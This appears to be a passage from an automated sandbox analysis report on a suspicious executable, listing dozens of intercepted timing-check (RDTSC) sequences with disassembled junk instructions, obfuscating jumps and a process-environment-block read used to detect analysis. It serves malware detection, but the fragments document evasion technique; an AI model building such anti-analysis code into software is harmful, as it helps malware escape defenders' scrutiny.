Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FEFA09 second address: FEFA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007FAD4CB7C007h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAD4CB7BFFDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FEFFE9 second address: FEFFF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FAD4CB4B576h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF09AE second address: FF09B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF09B4 second address: FF09C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007FAD4CB4B588h 0x0000000b jo 00007FAD4CB4B582h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF4472 second address: FF4476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF4476 second address: FF448C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jno 00007FAD4CB4B576h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FAD4CB4B576h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF448C second address: FF44A3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAD4CB7BFF6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FAD4CB7BFF6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF44A3 second address: FF44C3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FAD4CB4B586h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF44C3 second address: FF44C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF4622 second address: FF4627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF4627 second address: FF466B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7C002h 0x00000009 jo 00007FAD4CB7BFF6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jnp 00007FAD4CB7BFF6h 0x00000019 jnl 00007FAD4CB7BFF6h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007FAD4CB7BFFEh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF466B second address: FF4671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: FF4671 second address: FF468F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAD4CB7C009h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 1037D63 second address: 1037D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 103A3B0 second address: 103A3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 10365A3 second address: 10365B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAD4CB4B576h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 1116649 second address: 111664D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 1115B97 second address: 1115BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jng 00007FAD4CB4B576h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 1115E58 second address: 1115E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007FAD4CB7BFF6h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 1115E6C second address: 1115E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 1116224 second address: 1116251 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FAD4CB7BFF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 js 00007FAD4CB7BFF6h 0x00000016 jmp 00007FAD4CB7C004h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 1116394 second address: 1116399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 1116399 second address: 11163A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111A882 second address: 111A886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111A886 second address: 111A8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7BFFAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FAD4CB7BFFAh 0x00000010 popad 0x00000011 jc 00007FAD4CB7C022h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111A8AB second address: 111A8AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111A8AF second address: 111A8B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111D22E second address: 111D232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111D232 second address: 111D236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111D236 second address: 111D23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111D23C second address: 111D246 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB7BFFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111D794 second address: 111D79A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111EDB7 second address: 111EDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7BFFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 111EDC7 second address: 111EDEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FAD4CB4B589h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 1120BBF second address: 1120BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74300DA second address: 7430119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a sub esp, 18h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FAD4CB4B57Dh 0x00000016 add ecx, 133F0056h 0x0000001c jmp 00007FAD4CB4B581h 0x00000021 popfd 0x00000022 mov dx, si 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430119 second address: 7430135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB7C008h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430135 second address: 7430139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430139 second address: 7430148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430148 second address: 743014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743014C second address: 7430152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430152 second address: 7430236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 2E6Dh 0x00000007 call 00007FAD4CB4B57Ah 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FAD4CB4B587h 0x0000001a add esi, 5CB3DC4Eh 0x00000020 jmp 00007FAD4CB4B589h 0x00000025 popfd 0x00000026 call 00007FAD4CB4B580h 0x0000002b pushfd 0x0000002c jmp 00007FAD4CB4B582h 0x00000031 xor esi, 033CE3F8h 0x00000037 jmp 00007FAD4CB4B57Bh 0x0000003c popfd 0x0000003d pop eax 0x0000003e popad 0x0000003f mov ebx, dword ptr [eax+10h] 0x00000042 pushad 0x00000043 mov si, di 0x00000046 mov esi, edi 0x00000048 popad 0x00000049 push eax 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007FAD4CB4B586h 0x00000051 adc eax, 14456D88h 0x00000057 jmp 00007FAD4CB4B57Bh 0x0000005c popfd 0x0000005d jmp 00007FAD4CB4B588h 0x00000062 popad 0x00000063 mov dword ptr [esp], esi 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 movsx edi, cx 0x0000006c mov cx, FAF5h 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430236 second address: 74302A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAD4CB7BFFDh 0x00000009 adc ch, 00000006h 0x0000000c jmp 00007FAD4CB7C001h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov esi, dword ptr [772406ECh] 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAD4CB7C003h 0x00000022 or ah, 0000003Eh 0x00000025 jmp 00007FAD4CB7C009h 0x0000002a popfd 0x0000002b popad 0x0000002c test esi, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FAD4CB7BFFDh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74302A9 second address: 7430362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FAD4CB4C286h 0x00000010 jmp 00007FAD4CB4B589h 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FAD4CB4B57Ch 0x0000001d add cl, FFFFFFC8h 0x00000020 jmp 00007FAD4CB4B57Bh 0x00000025 popfd 0x00000026 jmp 00007FAD4CB4B588h 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ebx, 281DE4D4h 0x00000033 mov bl, 7Ah 0x00000035 popad 0x00000036 xchg eax, edi 0x00000037 jmp 00007FAD4CB4B584h 0x0000003c call dword ptr [77210B60h] 0x00000042 mov eax, 766BE5E0h 0x00000047 ret 0x00000048 jmp 00007FAD4CB4B580h 0x0000004d push 00000044h 0x0000004f jmp 00007FAD4CB4B580h 0x00000054 pop edi 0x00000055 pushad 0x00000056 call 00007FAD4CB4B57Eh 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430362 second address: 7430380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FAD4CB7C001h 0x0000000a popad 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430380 second address: 7430384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430384 second address: 7430388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430388 second address: 743038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743038E second address: 74303CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C002h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAD4CB7BFFBh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov dh, 89h 0x00000013 popad 0x00000014 push dword ptr [eax] 0x00000016 jmp 00007FAD4CB7BFFAh 0x0000001b mov eax, dword ptr fs:[00000030h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74303CD second address: 74303D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74303D1 second address: 74303D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74303D7 second address: 743040A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 5911h 0x00000007 pushfd 0x00000008 jmp 00007FAD4CB4B57Eh 0x0000000d add si, 8C68h 0x00000012 jmp 00007FAD4CB4B57Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [eax+18h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743040A second address: 743040E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743040E second address: 7430412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430412 second address: 7430418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430467 second address: 74304B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c jmp 00007FAD4CB4B57Fh 0x00000011 je 00007FADBC8DA79Ch 0x00000017 pushad 0x00000018 mov si, A30Bh 0x0000001c push ecx 0x0000001d call 00007FAD4CB4B587h 0x00000022 pop eax 0x00000023 pop edx 0x00000024 popad 0x00000025 sub eax, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov ecx, ebx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74304B0 second address: 7430512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C006h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAD4CB7BFFDh 0x00000012 xor ecx, 5C5DD416h 0x00000018 jmp 00007FAD4CB7C001h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esi+04h], eax 0x00000022 jmp 00007FAD4CB7BFFEh 0x00000027 mov dword ptr [esi+08h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov di, 1650h 0x00000031 push edi 0x00000032 pop ecx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430512 second address: 7430518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74305C8 second address: 74305CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74305CC second address: 74305E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74305E9 second address: 74305EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74305EF second address: 7430611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+1Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430611 second address: 7430617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430617 second address: 743062D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B57Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edi, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743062D second address: 743065F instructions: 0x00000000 rdtsc 0x00000002 mov ax, FD6Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 mov bx, si 0x0000000c mov ecx, 52D9D9BDh 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esi+20h], eax 0x00000016 pushad 0x00000017 mov dl, 05h 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+60h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAD4CB7C003h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743065F second address: 74306A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c jmp 00007FAD4CB4B57Eh 0x00000011 mov eax, dword ptr [ebx+64h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAD4CB4B587h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74306A9 second address: 74306E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB7BFFFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+28h], eax 0x00000010 jmp 00007FAD4CB7C004h 0x00000015 mov eax, dword ptr [ebx+68h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 74306E0 second address: 74306E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430849 second address: 743084F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430922 second address: 7430928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430928 second address: 743092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743092E second address: 7430932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430932 second address: 7430936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743094A second address: 743094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743094E second address: 7430954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430954 second address: 743095A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743095A second address: 743095E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 743095E second address: 7430A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007FAD4CB4B583h 0x0000000f test edi, edi 0x00000011 pushad 0x00000012 push esi 0x00000013 mov edx, 13257166h 0x00000018 pop edx 0x00000019 popad 0x0000001a js 00007FADBC8DA2B3h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FAD4CB4B57Fh 0x00000027 and cl, FFFFFFEEh 0x0000002a jmp 00007FAD4CB4B589h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007FAD4CB4B580h 0x00000036 jmp 00007FAD4CB4B585h 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp-0Ch] 0x00000040 pushad 0x00000041 mov ax, 63F3h 0x00000045 popad 0x00000046 mov dword ptr [esi+04h], eax 0x00000049 jmp 00007FAD4CB4B582h 0x0000004e lea eax, dword ptr [ebx+78h] 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430A09 second address: 7430A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: 7430A26 second address: 7430A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB4B57Ch 0x00000009 rdtsc
